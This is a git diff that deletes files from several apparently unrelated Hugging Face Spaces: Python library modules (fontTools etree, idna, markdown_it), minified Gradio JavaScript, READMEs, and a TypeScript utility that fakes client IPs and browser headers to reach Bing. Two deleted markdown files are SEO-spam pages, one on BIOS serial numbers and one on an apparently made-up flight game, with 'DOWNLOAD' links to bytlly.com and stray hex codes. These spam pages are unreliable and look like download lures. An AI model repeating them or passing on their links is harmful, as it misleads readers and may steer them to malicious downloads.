-""" -from fontTools.misc.textTools import tostr - - -XML_DECLARATION = """""" - -__all__ = [ - # public symbols - "Comment", - "dump", - "Element", - "ElementTree", - "fromstring", - "fromstringlist", - "iselement", - "iterparse", - "parse", - "ParseError", - "PI", - "ProcessingInstruction", - "QName", - "SubElement", - "tostring", - "tostringlist", - "TreeBuilder", - "XML", - "XMLParser", - "register_namespace", -] - -try: - from lxml.etree import * - - _have_lxml = True -except ImportError: - try: - from xml.etree.cElementTree import * - - # the cElementTree version of XML function doesn't support - # the optional 'parser' keyword argument - from xml.etree.ElementTree import XML - except ImportError: # pragma: no cover - from xml.etree.ElementTree import * - _have_lxml = False - - import sys - - # dict is always ordered in python >= 3.6 and on pypy - PY36 = sys.version_info >= (3, 6) - try: - import __pypy__ - except ImportError: - __pypy__ = None - _dict_is_ordered = bool(PY36 or __pypy__) - del PY36, __pypy__ - - if _dict_is_ordered: - _Attrib = dict - else: - from collections import OrderedDict as _Attrib - - if isinstance(Element, type): - _Element = Element - else: - # in py27, cElementTree.Element cannot be subclassed, so - # we need to import the pure-python class - from xml.etree.ElementTree import Element as _Element - - class Element(_Element): - """Element subclass that keeps the order of attributes.""" - - def __init__(self, tag, attrib=_Attrib(), **extra): - super(Element, self).__init__(tag) - self.attrib = _Attrib() - if attrib: - self.attrib.update(attrib) - if extra: - self.attrib.update(extra) - - def SubElement(parent, tag, attrib=_Attrib(), **extra): - """Must override SubElement as well otherwise _elementtree.SubElement - fails if 'parent' is a subclass of Element object. 
- """ - element = parent.__class__(tag, attrib, **extra) - parent.append(element) - return element - - def _iterwalk(element, events, tag): - include = tag is None or element.tag == tag - if include and "start" in events: - yield ("start", element) - for e in element: - for item in _iterwalk(e, events, tag): - yield item - if include: - yield ("end", element) - - def iterwalk(element_or_tree, events=("end",), tag=None): - """A tree walker that generates events from an existing tree as - if it was parsing XML data with iterparse(). - Drop-in replacement for lxml.etree.iterwalk. - """ - if iselement(element_or_tree): - element = element_or_tree - else: - element = element_or_tree.getroot() - if tag == "*": - tag = None - for item in _iterwalk(element, events, tag): - yield item - - _ElementTree = ElementTree - - class ElementTree(_ElementTree): - """ElementTree subclass that adds 'pretty_print' and 'doctype' - arguments to the 'write' method. - Currently these are only supported for the default XML serialization - 'method', and not also for "html" or "text", for these are delegated - to the base class. 
- """ - - def write( - self, - file_or_filename, - encoding=None, - xml_declaration=False, - method=None, - doctype=None, - pretty_print=False, - ): - if method and method != "xml": - # delegate to super-class - super(ElementTree, self).write( - file_or_filename, - encoding=encoding, - xml_declaration=xml_declaration, - method=method, - ) - return - - if encoding is not None and encoding.lower() == "unicode": - if xml_declaration: - raise ValueError( - "Serialisation to unicode must not request an XML declaration" - ) - write_declaration = False - encoding = "unicode" - elif xml_declaration is None: - # by default, write an XML declaration only for non-standard encodings - write_declaration = encoding is not None and encoding.upper() not in ( - "ASCII", - "UTF-8", - "UTF8", - "US-ASCII", - ) - else: - write_declaration = xml_declaration - - if encoding is None: - encoding = "ASCII" - - if pretty_print: - # NOTE this will modify the tree in-place - _indent(self._root) - - with _get_writer(file_or_filename, encoding) as write: - if write_declaration: - write(XML_DECLARATION % encoding.upper()) - if pretty_print: - write("\n") - if doctype: - write(_tounicode(doctype)) - if pretty_print: - write("\n") - - qnames, namespaces = _namespaces(self._root) - _serialize_xml(write, self._root, qnames, namespaces) - - import io - - def tostring( - element, - encoding=None, - xml_declaration=None, - method=None, - doctype=None, - pretty_print=False, - ): - """Custom 'tostring' function that uses our ElementTree subclass, with - pretty_print support. 
- """ - stream = io.StringIO() if encoding == "unicode" else io.BytesIO() - ElementTree(element).write( - stream, - encoding=encoding, - xml_declaration=xml_declaration, - method=method, - doctype=doctype, - pretty_print=pretty_print, - ) - return stream.getvalue() - - # serialization support - - import re - - # Valid XML strings can include any Unicode character, excluding control - # characters, the surrogate blocks, FFFE, and FFFF: - # Char ::= #x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF] - # Here we reversed the pattern to match only the invalid characters. - # For the 'narrow' python builds supporting only UCS-2, which represent - # characters beyond BMP as UTF-16 surrogate pairs, we need to pass through - # the surrogate block. I haven't found a more elegant solution... - UCS2 = sys.maxunicode < 0x10FFFF - if UCS2: - _invalid_xml_string = re.compile( - "[\u0000-\u0008\u000B-\u000C\u000E-\u001F\uFFFE-\uFFFF]" - ) - else: - _invalid_xml_string = re.compile( - "[\u0000-\u0008\u000B-\u000C\u000E-\u001F\uD800-\uDFFF\uFFFE-\uFFFF]" - ) - - def _tounicode(s): - """Test if a string is valid user input and decode it to unicode string - using ASCII encoding if it's a bytes string. - Reject all bytes/unicode input that contains non-XML characters. - Reject all bytes input that contains non-ASCII characters. - """ - try: - s = tostr(s, encoding="ascii", errors="strict") - except UnicodeDecodeError: - raise ValueError( - "Bytes strings can only contain ASCII characters. " - "Use unicode strings for non-ASCII characters." 
- ) - except AttributeError: - _raise_serialization_error(s) - if s and _invalid_xml_string.search(s): - raise ValueError( - "All strings must be XML compatible: Unicode or ASCII, " - "no NULL bytes or control characters" - ) - return s - - import contextlib - - @contextlib.contextmanager - def _get_writer(file_or_filename, encoding): - # returns text write method and release all resources after using - try: - write = file_or_filename.write - except AttributeError: - # file_or_filename is a file name - f = open( - file_or_filename, - "w", - encoding="utf-8" if encoding == "unicode" else encoding, - errors="xmlcharrefreplace", - ) - with f: - yield f.write - else: - # file_or_filename is a file-like object - # encoding determines if it is a text or binary writer - if encoding == "unicode": - # use a text writer as is - yield write - else: - # wrap a binary writer with TextIOWrapper - detach_buffer = False - if isinstance(file_or_filename, io.BufferedIOBase): - buf = file_or_filename - elif isinstance(file_or_filename, io.RawIOBase): - buf = io.BufferedWriter(file_or_filename) - detach_buffer = True - else: - # This is to handle passed objects that aren't in the - # IOBase hierarchy, but just have a write method - buf = io.BufferedIOBase() - buf.writable = lambda: True - buf.write = write - try: - # TextIOWrapper uses this methods to determine - # if BOM (for UTF-16, etc) should be added - buf.seekable = file_or_filename.seekable - buf.tell = file_or_filename.tell - except AttributeError: - pass - wrapper = io.TextIOWrapper( - buf, - encoding=encoding, - errors="xmlcharrefreplace", - newline="\n", - ) - try: - yield wrapper.write - finally: - # Keep the original file open when the TextIOWrapper and - # the BufferedWriter are destroyed - wrapper.detach() - if detach_buffer: - buf.detach() - - from xml.etree.ElementTree import _namespace_map - - def _namespaces(elem): - # identify namespaces used in this tree - - # maps qnames to *encoded* prefix:local names - qnames = 
{None: None} - - # maps uri:s to prefixes - namespaces = {} - - def add_qname(qname): - # calculate serialized qname representation - try: - qname = _tounicode(qname) - if qname[:1] == "{": - uri, tag = qname[1:].rsplit("}", 1) - prefix = namespaces.get(uri) - if prefix is None: - prefix = _namespace_map.get(uri) - if prefix is None: - prefix = "ns%d" % len(namespaces) - else: - prefix = _tounicode(prefix) - if prefix != "xml": - namespaces[uri] = prefix - if prefix: - qnames[qname] = "%s:%s" % (prefix, tag) - else: - qnames[qname] = tag # default element - else: - qnames[qname] = qname - except TypeError: - _raise_serialization_error(qname) - - # populate qname and namespaces table - for elem in elem.iter(): - tag = elem.tag - if isinstance(tag, QName): - if tag.text not in qnames: - add_qname(tag.text) - elif isinstance(tag, str): - if tag not in qnames: - add_qname(tag) - elif tag is not None and tag is not Comment and tag is not PI: - _raise_serialization_error(tag) - for key, value in elem.items(): - if isinstance(key, QName): - key = key.text - if key not in qnames: - add_qname(key) - if isinstance(value, QName) and value.text not in qnames: - add_qname(value.text) - text = elem.text - if isinstance(text, QName) and text.text not in qnames: - add_qname(text.text) - return qnames, namespaces - - def _serialize_xml(write, elem, qnames, namespaces, **kwargs): - tag = elem.tag - text = elem.text - if tag is Comment: - write("" % _tounicode(text)) - elif tag is ProcessingInstruction: - write("" % _tounicode(text)) - else: - tag = qnames[_tounicode(tag) if tag is not None else None] - if tag is None: - if text: - write(_escape_cdata(text)) - for e in elem: - _serialize_xml(write, e, qnames, None) - else: - write("<" + tag) - if namespaces: - for uri, prefix in sorted( - namespaces.items(), key=lambda x: x[1] - ): # sort on prefix - if prefix: - prefix = ":" + prefix - write(' xmlns%s="%s"' % (prefix, _escape_attrib(uri))) - attrs = elem.attrib - if attrs: - # try 
to keep existing attrib order - if len(attrs) <= 1 or type(attrs) is _Attrib: - items = attrs.items() - else: - # if plain dict, use lexical order - items = sorted(attrs.items()) - for k, v in items: - if isinstance(k, QName): - k = _tounicode(k.text) - else: - k = _tounicode(k) - if isinstance(v, QName): - v = qnames[_tounicode(v.text)] - else: - v = _escape_attrib(v) - write(' %s="%s"' % (qnames[k], v)) - if text is not None or len(elem): - write(">") - if text: - write(_escape_cdata(text)) - for e in elem: - _serialize_xml(write, e, qnames, None) - write("") - else: - write("/>") - if elem.tail: - write(_escape_cdata(elem.tail)) - - def _raise_serialization_error(text): - raise TypeError("cannot serialize %r (type %s)" % (text, type(text).__name__)) - - def _escape_cdata(text): - # escape character data - try: - text = _tounicode(text) - # it's worth avoiding do-nothing calls for short strings - if "&" in text: - text = text.replace("&", "&") - if "<" in text: - text = text.replace("<", "<") - if ">" in text: - text = text.replace(">", ">") - return text - except (TypeError, AttributeError): - _raise_serialization_error(text) - - def _escape_attrib(text): - # escape attribute value - try: - text = _tounicode(text) - if "&" in text: - text = text.replace("&", "&") - if "<" in text: - text = text.replace("<", "<") - if ">" in text: - text = text.replace(">", ">") - if '"' in text: - text = text.replace('"', """) - if "\n" in text: - text = text.replace("\n", " ") - return text - except (TypeError, AttributeError): - _raise_serialization_error(text) - - def _indent(elem, level=0): - # From http://effbot.org/zone/element-lib.htm#prettyprint - i = "\n" + level * " " - if len(elem): - if not elem.text or not elem.text.strip(): - elem.text = i + " " - if not elem.tail or not elem.tail.strip(): - elem.tail = i - for elem in elem: - _indent(elem, level + 1) - if not elem.tail or not elem.tail.strip(): - elem.tail = i - else: - if level and (not elem.tail or not 
elem.tail.strip()): - elem.tail = i diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/dockerfile-d67bbd50.js b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/dockerfile-d67bbd50.js deleted file mode 100644 index 5405cd3af19be5d8cb56dbb55aefa442653e888a..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/dockerfile-d67bbd50.js +++ /dev/null @@ -1,2 +0,0 @@ -function c(n){a(n,"start");var t={},e=n.languageData||{},s=!1;for(var l in n)if(l!=e&&n.hasOwnProperty(l))for(var u=t[l]=[],o=n[l],r=0;r2&&o.token&&typeof o.token!="string"){e.pending=[];for(var g=2;g-1)return null;var l=e.indent.length-1,u=n[e.state];n:for(;;){for(var o=0;o=!&|~$:]/,t;function p(e,n){t=null;var r=e.next();if(r=="#")return e.skipToEnd(),"comment";if(r=="0"&&e.eat("x"))return e.eatWhile(/[\da-f]/i),"number";if(r=="."&&e.eat(/\d/))return e.match(/\d*(?:e[+\-]?\d+)?/),"number";if(/\d/.test(r))return e.match(/\d*(?:\.\d+)?(?:e[+\-]\d+)?L?/),"number";if(r=="'"||r=='"')return n.tokenize=E(r),"string";if(r=="`")return e.match(/[^`]+`/),"string.special";if(r=="."&&e.match(/.(?:[.]|\d+)/))return"keyword";if(/[a-zA-Z\.]/.test(r)){e.eatWhile(/[\w\.]/);var i=e.current();return h.propertyIsEnumerable(i)?"atom":N.propertyIsEnumerable(i)?(A.propertyIsEnumerable(i)&&!e.match(/\s*if(\s+|$)/,!1)&&(t="block"),"keyword"):m.propertyIsEnumerable(i)?"builtin":"variable"}else return r=="%"?(e.skipTo("%")&&e.next(),"variableName.special"):r=="<"&&e.eat("-")||r=="<"&&e.match("<-")||r=="-"&&e.match(/>>?/)||r=="="&&n.ctx.argList?"operator":k.test(r)?(r=="$"||e.eatWhile(k),"operator"):/[\(\){}\[\];]/.test(r)?(t=r,r==";"?"punctuation":null):null}function E(e){return function(n,r){if(n.eat("\\")){var i=n.next();return 
i=="x"?n.match(/^[a-f0-9]{2}/i):(i=="u"||i=="U")&&n.eat("{")&&n.skipTo("}")?n.next():i=="u"?n.match(/^[a-f0-9]{4}/i):i=="U"?n.match(/^[a-f0-9]{8}/i):/[0-7]/.test(i)&&n.match(/^[0-7]{1,2}/),"string.special"}else{for(var l;(l=n.next())!=null;){if(l==e){r.tokenize=p;break}if(l=="\\"){n.backUp(1);break}}return"string"}}}var v=1,u=2,c=4;function o(e,n,r){e.ctx={type:n,indent:e.indent,flags:0,column:r.column(),prev:e.ctx}}function x(e,n){var r=e.ctx;e.ctx={type:r.type,indent:r.indent,flags:r.flags|n,column:r.column,prev:r.prev}}function a(e){e.indent=e.ctx.indent,e.ctx=e.ctx.prev}const I={name:"r",startState:function(e){return{tokenize:p,ctx:{type:"top",indent:-e,flags:u},indent:0,afterIdent:!1}},token:function(e,n){if(e.sol()&&(n.ctx.flags&3||(n.ctx.flags|=u),n.ctx.flags&c&&a(n),n.indent=e.indentation()),e.eatSpace())return null;var r=n.tokenize(e,n);return r!="comment"&&!(n.ctx.flags&u)&&x(n,v),(t==";"||t=="{"||t=="}")&&n.ctx.type=="block"&&a(n),t=="{"?o(n,"}",e):t=="("?(o(n,")",e),n.afterIdent&&(n.ctx.argList=!0)):t=="["?o(n,"]",e):t=="block"?o(n,"block",e):t==n.ctx.type?a(n):n.ctx.type=="block"&&r!="comment"&&x(n,c),n.afterIdent=r=="variable"||r=="keyword",r},indent:function(e,n,r){if(e.tokenize!=p)return 0;var i=n&&n.charAt(0),l=e.ctx,d=i==l.type;return l.flags&c&&(l=l.prev),l.type=="block"?l.indent+(i=="{"?0:r.unit):l.flags&v?l.column+(d?0:1):l.indent+(d?0:r.unit)},languageData:{wordChars:".",commentTokens:{line:"#"},autocomplete:b.concat(g,s)}};export{I as r}; -//# sourceMappingURL=r-3ca97919.js.map diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/idna/codec.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/idna/codec.py deleted file mode 100644 index 1ca9ba62c208527b796b49306f4b8c95eb868a51..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/idna/codec.py +++ /dev/null @@ -1,112 +0,0 @@ -from .core import encode, decode, alabel, ulabel, 
IDNAError -import codecs -import re -from typing import Tuple, Optional - -_unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]') - -class Codec(codecs.Codec): - - def encode(self, data: str, errors: str = 'strict') -> Tuple[bytes, int]: - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return b"", 0 - - return encode(data), len(data) - - def decode(self, data: bytes, errors: str = 'strict') -> Tuple[str, int]: - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return '', 0 - - return decode(data), len(data) - -class IncrementalEncoder(codecs.BufferedIncrementalEncoder): - def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return "", 0 - - labels = _unicode_dots_re.split(data) - trailing_dot = '' - if labels: - if not labels[-1]: - trailing_dot = '.' - del labels[-1] - elif not final: - # Keep potentially unfinished label until the next call - del labels[-1] - if labels: - trailing_dot = '.' - - result = [] - size = 0 - for label in labels: - result.append(alabel(label)) - if size: - size += 1 - size += len(label) - - # Join with U+002E - result_str = '.'.join(result) + trailing_dot # type: ignore - size += len(trailing_dot) - return result_str, size - -class IncrementalDecoder(codecs.BufferedIncrementalDecoder): - def _buffer_decode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return ('', 0) - - labels = _unicode_dots_re.split(data) - trailing_dot = '' - if labels: - if not labels[-1]: - trailing_dot = '.' 
- del labels[-1] - elif not final: - # Keep potentially unfinished label until the next call - del labels[-1] - if labels: - trailing_dot = '.' - - result = [] - size = 0 - for label in labels: - result.append(ulabel(label)) - if size: - size += 1 - size += len(label) - - result_str = '.'.join(result) + trailing_dot - size += len(trailing_dot) - return (result_str, size) - - -class StreamWriter(Codec, codecs.StreamWriter): - pass - - -class StreamReader(Codec, codecs.StreamReader): - pass - - -def getregentry() -> codecs.CodecInfo: - # Compatibility as a search_function for codecs.register() - return codecs.CodecInfo( - name='idna', - encode=Codec().encode, # type: ignore - decode=Codec().decode, # type: ignore - incrementalencoder=IncrementalEncoder, - incrementaldecoder=IncrementalDecoder, - streamwriter=StreamWriter, - streamreader=StreamReader, - ) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/markdown_it/helpers/__init__.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/markdown_it/helpers/__init__.py deleted file mode 100644 index 3dbbdd1d480ecc5ace6529f9005d40d5985529ae..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/markdown_it/helpers/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -"""Functions for parsing Links -""" -__all__ = ("parseLinkLabel", "parseLinkDestination", "parseLinkTitle") -from .parse_link_destination import parseLinkDestination -from .parse_link_label import parseLinkLabel -from .parse_link_title import parseLinkTitle diff --git a/spaces/lavanyaparise/myenAIchatbot/README.md b/spaces/lavanyaparise/myenAIchatbot/README.md deleted file mode 100644 index 1de0a72fbf0e47879420bc975210acafbf96a776..0000000000000000000000000000000000000000 --- a/spaces/lavanyaparise/myenAIchatbot/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: MyenAIchatbot -emoji: 🌖 -colorFrom: purple -colorTo: purple -sdk: gradio -sdk_version: 
3.39.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/leilevy/bingo/src/lib/utils.ts b/spaces/leilevy/bingo/src/lib/utils.ts deleted file mode 100644 index 760ab389d213df20c359d7993475fe3bf9031bff..0000000000000000000000000000000000000000 --- a/spaces/leilevy/bingo/src/lib/utils.ts +++ /dev/null @@ -1,154 +0,0 @@ -import { clsx, type ClassValue } from 'clsx' -import { customAlphabet } from 'nanoid' -import { twMerge } from 'tailwind-merge' -import { debug } from './isomorphic' - -export function cn(...inputs: ClassValue[]) { - return twMerge(clsx(inputs)) -} - -export const nanoid = customAlphabet( - '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', - 7 -) // 7-character random string - -export function createChunkDecoder() { - const decoder = new TextDecoder() - return function (chunk: Uint8Array | undefined): string { - if (!chunk) return '' - return decoder.decode(chunk, { stream: true }) - } -} - -export function random (start: number, end: number) { - return start + Math.ceil(Math.random() * (end - start)) -} - -export function randomIP() { - return `11.${random(104, 107)}.${random(1, 255)}.${random(1, 255)}` -} - -export const defaultUID = 'xxx' - -export function parseHeadersFromCurl(content: string) { - const re = /-H '([^:]+):\s*([^']+)/mg - const headers: HeadersInit = {} - content = content.replaceAll('-H "', '-H \'').replaceAll('" ^', '\'\\').replaceAll('^\\^"', '"') // 将 cmd curl 转成 bash curl - content.replace(re, (_: string, key: string, value: string) => { - headers[key] = value - return '' - }) - - return headers -} - -export const ChunkKeys = ['BING_HEADER', 'BING_HEADER1', 'BING_HEADER2'] -export function encodeHeadersToCookie(content: string) { - const base64Content = btoa(content) - const contentChunks = base64Content.match(/.{1,4000}/g) || [] - return ChunkKeys.map((key, index) => `${key}=${contentChunks[index] ?? 
''}`) -} - -export function extraCurlFromCookie(cookies: Partial<{ [key: string]: string }>) { - let base64Content = '' - ChunkKeys.forEach((key) => { - base64Content += (cookies[key] || '') - }) - try { - return atob(base64Content) - } catch(e) { - return '' - } -} - -export function extraHeadersFromCookie(cookies: Partial<{ [key: string]: string }>) { - return parseHeadersFromCurl(extraCurlFromCookie(cookies)) -} - -export function formatDate(input: string | number | Date): string { - const date = new Date(input) - return date.toLocaleDateString('en-US', { - month: 'long', - day: 'numeric', - year: 'numeric' - }) -} - -export function parseCookie(cookie: string, cookieName: string) { - const targetCookie = new RegExp(`(?:[; ]|^)${cookieName}=([^;]*)`).test(cookie) ? RegExp.$1 : cookie - return targetCookie ? decodeURIComponent(targetCookie).trim() : cookie.indexOf('=') === -1 ? cookie.trim() : '' -} - -export function setCookie(key: string, value: string) { - const maxAge = value ? 86400 * 30 : 0 - document.cookie = `${key}=${value || ''}; Path=/; Max-Age=${maxAge}; SameSite=None; Secure` -} - -export function getCookie(cookieName: string) { - const re = new RegExp(`(?:[; ]|^)${cookieName}=([^;]*)`) - return re.test(document.cookie) ? RegExp.$1 : '' -} - -export function parseCookies(cookie: string, cookieNames: string[]) { - const cookies: { [key: string]: string } = {} - cookieNames.forEach(cookieName => { - cookies[cookieName] = parseCookie(cookie, cookieName) - }) - return cookies -} - -export const DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.0.0' -export const DEFAULT_IP = process.env.BING_IP || randomIP() - -export function parseUA(ua?: string, default_ua = DEFAULT_UA) { - return / EDGE?/i.test(decodeURIComponent(ua || '')) ? 
decodeURIComponent(ua!.trim()) : default_ua -} - -export function mockUser(cookies: Partial<{ [key: string]: string }>) { - const { - BING_UA = process.env.BING_UA, - BING_IP = process.env.BING_IP, - _U = defaultUID, - } = cookies - const ua = parseUA(BING_UA) - - return { - 'x-forwarded-for': BING_IP || DEFAULT_IP, - 'Accept-Encoding': 'gzip, deflate, br', - 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', - 'User-Agent': ua!, - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - cookie: `_U=${_U}` || '', - } -} - -export function createHeaders(cookies: Partial<{ [key: string]: string }>, type?: string) { - let { - BING_HEADER = process.env.BING_HEADER, - IMAGE_ONLY = process.env.IMAGE_ONLY ?? '1', - } = cookies - const imageOnly = /^(1|true|yes)$/.test(String(IMAGE_ONLY)) - if (BING_HEADER) { - if ( - (imageOnly && type === 'image') - || !imageOnly - ) { - return extraHeadersFromCookie({ - BING_HEADER, - ...cookies, - }) || {} - } - } - return mockUser(cookies) -} - -export class WatchDog { - private tid = 0 - watch(fn: Function, timeout = 2000) { - clearTimeout(this.tid) - this.tid = setTimeout(fn, timeout + Math.random() * 1000) - } - reset() { - clearTimeout(this.tid) - } -} diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Can You Change Serial Number In Bios BETTER.md b/spaces/lincquiQcaudo/Top-20-Diffusion/Can You Change Serial Number In Bios BETTER.md deleted file mode 100644 index 7cc60a2d2f549ab52b27c3fed4a32d2ea7485afd..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Can You Change Serial Number In Bios BETTER.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Can You Change Serial Number In Bios


    DOWNLOAD ✺✺✺ https://bytlly.com/2uGxvA



    - -How to Find Serial Number of Windows PC Information Sometimes abbreviated ... If you are running a VM you can change it quite easily by just typing something ... Note: if you have updated your BIOS since buying it, don't be ... 4d29de3e1b
    -
    -
    -

    diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Master Game Pc Pesawat Tempur ((BETTER)).md b/spaces/lincquiQcaudo/Top-20-Diffusion/Master Game Pc Pesawat Tempur ((BETTER)).md deleted file mode 100644 index e716ab83c3e20fba27772b30be29c1074c301385..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Master Game Pc Pesawat Tempur ((BETTER)).md +++ /dev/null @@ -1,16 +0,0 @@ -
    -

    Master Game Pc Pesawat Tempur: The Ultimate Flight Simulator for PC Gamers

    -

    If you are a fan of flight simulators and aerial combat games, you might want to check out Master Game Pc Pesawat Tempur, a new game developed by an Indonesian studio. This game lets you experience the thrill of flying and fighting in various types of aircraft, from modern jets to classic warplanes.

    -

    Master Game Pc Pesawat Tempur features realistic graphics, physics, and sound effects that will immerse you in the cockpit of your chosen plane. You can customize your aircraft with different weapons, skins, and upgrades, and test your skills in various missions and modes. You can also challenge other players online or team up with them in co-op mode.

    -

    Master Game Pc Pesawat Tempur


    DOWNLOAD ✓✓✓ https://bytlly.com/2uGw1b



    -

    Master Game Pc Pesawat Tempur is compatible with Windows 10 and supports keyboard, mouse, joystick, and VR devices. You can download the game from Steam or the official website. If you are looking for a flight simulator that combines realism, fun, and variety, Master Game Pc Pesawat Tempur might be the game for you.

    - -

    One of the main attractions of Master Game Pc Pesawat Tempur is the variety of aircraft that you can fly and fight with. The game features over 50 different planes, ranging from modern fighters like the F-22 Raptor and the Su-35 Flanker to historical warplanes like the Spitfire and the Zero. Each plane has its own characteristics, strengths, and weaknesses, and you can learn how to master them in the tutorial mode.

    -

    -

    The game also offers a wide range of missions and scenarios that will test your flying and combat skills. You can take part in dogfights, bombing runs, escort missions, stealth operations, and more. You can also choose from different difficulty levels and weather conditions to suit your preference. The game has a dynamic campaign mode that adapts to your performance and choices, as well as a sandbox mode that lets you create your own scenarios.

    -

    Another feature of Master Game Pc Pesawat Tempur is the online multiplayer mode, where you can compete or cooperate with other players from around the world. You can join or create a server and choose from various modes, such as team deathmatch, capture the flag, king of the hill, and more. You can also chat with other players using voice or text communication. The game has a ranking system that tracks your stats and achievements, and a leaderboard that shows your position among other players.

    - -

    In addition to the gameplay features, Master Game Pc Pesawat Tempur also boasts impressive graphics and sound effects that enhance the realism and immersion of the game. The game uses a high-quality engine that renders detailed landscapes, weather effects, and lighting effects. The game also supports 4K resolution and HDR technology for a stunning visual experience. The sound effects are also realistic and dynamic, with authentic engine noises, explosions, and radio chatter. The game also has a catchy soundtrack that matches the mood and pace of the game.

    -

    Master Game Pc Pesawat Tempur is a game that will appeal to both casual and hardcore gamers who enjoy flight simulators and aerial combat games. The game offers a lot of content, variety, and challenge that will keep you entertained for hours. The game is also easy to play and accessible to anyone who wants to try it. Whether you want to fly solo or with friends, Master Game Pc Pesawat Tempur is a game that you should not miss.

    d5da3c52bf
    -
    -
    \ No newline at end of file diff --git a/spaces/lj1995/vocal2guitar/docs/README.en.md b/spaces/lj1995/vocal2guitar/docs/README.en.md deleted file mode 100644 index 1df5839ad420e5bbcb564c92853ec415bee7da44..0000000000000000000000000000000000000000 --- a/spaces/lj1995/vocal2guitar/docs/README.en.md +++ /dev/null @@ -1,104 +0,0 @@ -
    - -

    Retrieval-based-Voice-Conversion-WebUI

    -An easy-to-use Voice Conversion framework based on VITS.

    - -[![madewithlove](https://forthebadge.com/images/badges/built-with-love.svg)](https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI) - -
    - -[![Open In Colab](https://img.shields.io/badge/Colab-F9AB00?style=for-the-badge&logo=googlecolab&color=525252)](https://colab.research.google.com/github/liujing04/Retrieval-based-Voice-Conversion-WebUI/blob/main/Retrieval_based_Voice_Conversion_WebUI.ipynb) -[![Licence](https://img.shields.io/github/license/liujing04/Retrieval-based-Voice-Conversion-WebUI?style=for-the-badge)](https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI/blob/main/%E4%BD%BF%E7%94%A8%E9%9C%80%E9%81%B5%E5%AE%88%E7%9A%84%E5%8D%8F%E8%AE%AE-LICENSE.txt) -[![Huggingface](https://img.shields.io/badge/🤗%20-Spaces-yellow.svg?style=for-the-badge)](https://huggingface.co/lj1995/VoiceConversionWebUI/tree/main/) - -[![Discord](https://img.shields.io/badge/RVC%20Developers-Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/HcsmBBGyVk) - -
    - ------- -[**Changelog**](https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI/blob/main/Changelog_CN.md) | [**FAQ (Frequently Asked Questions)**](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI/wiki/FAQ-(Frequently-Asked-Questions)) - -[**English**](./README.en.md) | [**中文简体**](../README.md) | [**日本語**](./README.ja.md) | [**한국어**](./README.ko.md) ([**韓國語**](./README.ko.han.md)) - -> Check our [Demo Video](https://www.bilibili.com/video/BV1pm4y1z7Gm/) here! - -> Realtime Voice Conversion Software using RVC : [w-okada/voice-changer](https://github.com/w-okada/voice-changer) - -> The dataset for the pre-training model uses nearly 50 hours of high quality VCTK open source dataset. - -> High quality licensed song datasets will be added to training-set one after another for your use, without worrying about copyright infringement. -## Summary -This repository has the following features: -+ Reduce tone leakage by replacing source feature to training-set feature using top1 retrieval; -+ Easy and fast training, even on relatively poor graphics cards; -+ Training with a small amount of data also obtains relatively good results (>=10min low noise speech recommended); -+ Supporting model fusion to change timbres (using ckpt processing tab->ckpt merge); -+ Easy-to-use Webui interface; -+ Use the UVR5 model to quickly separate vocals and instruments. -## Preparing the environment -We recommend you install the dependencies through poetry. 
